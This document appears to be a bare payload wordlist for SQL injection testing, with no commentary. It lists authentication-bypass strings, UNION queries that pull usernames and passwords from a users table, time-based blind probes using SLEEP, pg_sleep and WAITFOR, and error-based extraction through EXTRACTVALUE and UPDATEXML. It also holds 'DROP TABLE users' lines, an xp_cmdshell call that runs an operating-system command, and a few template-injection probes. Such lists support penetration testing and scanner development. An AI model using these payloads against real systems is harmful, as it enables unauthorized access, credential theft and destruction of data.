'
"
' OR '1'='1
" OR "1"="1
' OR '1'='1'--
" OR "1"="1"--
' OR '1'='1'/*
1' OR '1'='1
1" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 1=1#
" OR 1=1#
') OR ('1'='1
") OR ("1"="1
')) OR (('1'='1
1 OR 1=1
1' OR '1'='1' --
admin'--
admin' #
admin'/*
' OR ''='
" OR ""="
'='
"="
1'1
1"1
'||'1
"||"1
'+'1
"+1+"
' AND '1'='1
" AND "1"="1
' AND 1=1--
" AND 1=1--
ORDER BY 1--
ORDER BY 10--
ORDER BY 100--
UNION SELECT NULL--
UNION SELECT NULL,NULL--
UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
" UNION SELECT 1,2,3--
1' UNION SELECT username,password FROM users--
'; DROP TABLE users--
'; SELECT SLEEP(5)--
'; WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--
" AND SLEEP(5)--
1' AND SLEEP(5)--
' OR SLEEP(5)--
'; SELECT pg_sleep(5)--
' || pg_sleep(5)--
'||pg_sleep(5)--
1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND BENCHMARK(10000000,SHA1('test'))--
'; EXEC xp_cmdshell('whoami')--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT version()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)--
${7*7}
{{7*7}}
<%= 7*7 %>
#{7*7}
*|7*7|*
' OR 'a'='a
" OR "a"="a
' OR 1--
" OR 1--
' OR ''='
" OR ""="
1' AND '1'='1
1" AND "1"="1
' OR 1=1#
" OR 1=1#
' OR 1=1/*
' OR 1=1;--
admin' OR '1'='1
' UNION SELECT NULL,NULL,NULL--
1; DROP TABLE users--
' AND ASCII(SUBSTRING((SELECT version()),1,1))>0--
' AND (SELECT COUNT(*) FROM information_schema.tables)>0--
' AND 1=0 UNION SELECT 1,2,3--
' HAVING 1=1--
' GROUP BY columnnames HAVING 1=1--
' AND 1=CONVERT(int,(SELECT @@version))--
' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
'; SELECT * FROM users WHERE ''=''
' OR 1=1 LIMIT 1--
" OR 1=1 LIMIT 1--
' OR 1=1 OFFSET 0--
1' AND (SELECT 1 FROM (SELECT SLEEP(2))a)--
' AND (SELECT * FROM (SELECT(SLEEP(2)))a)--
' AND IF(1=1,SLEEP(2),0)--
' AND (SELECT 0 FROM (SELECT SLEEP(2))a)--
' WAITFOR DELAY '0:0:2'--
'; WAITFOR DELAY '0:0:2'--
' AND pg_sleep(2)--
'; SELECT pg_sleep(2)--
1' AND BENCHMARK(5000000,SHA1('x'))--
' RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))--
' AND 1=0 UNION ALL SELECT 1,'2','3'--
' AND 1=0 UNION ALL SELECT NULL,NULL,NULL--
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' GROUP BY 1--
1' GROUP BY 1,2--
1' GROUP BY 1,2,3--
'-'
''
'`
'"
'"
' OR 'x'='x
" OR "x"="x
1 AND 1=1
1 AND 1=2
1 OR 1=1
1 OR 1=2
